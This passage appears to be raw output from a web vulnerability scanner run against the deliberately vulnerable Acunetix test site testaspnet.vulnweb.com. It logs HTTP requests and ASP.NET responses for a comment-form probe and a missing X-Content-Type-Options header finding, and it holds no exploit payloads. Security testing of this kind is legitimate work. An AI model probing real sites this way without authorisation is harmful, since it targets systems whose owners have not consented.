Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 395 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 987 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 987 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d%2Byr9JWRLj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 12523
Response Body - size: 12,523 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a 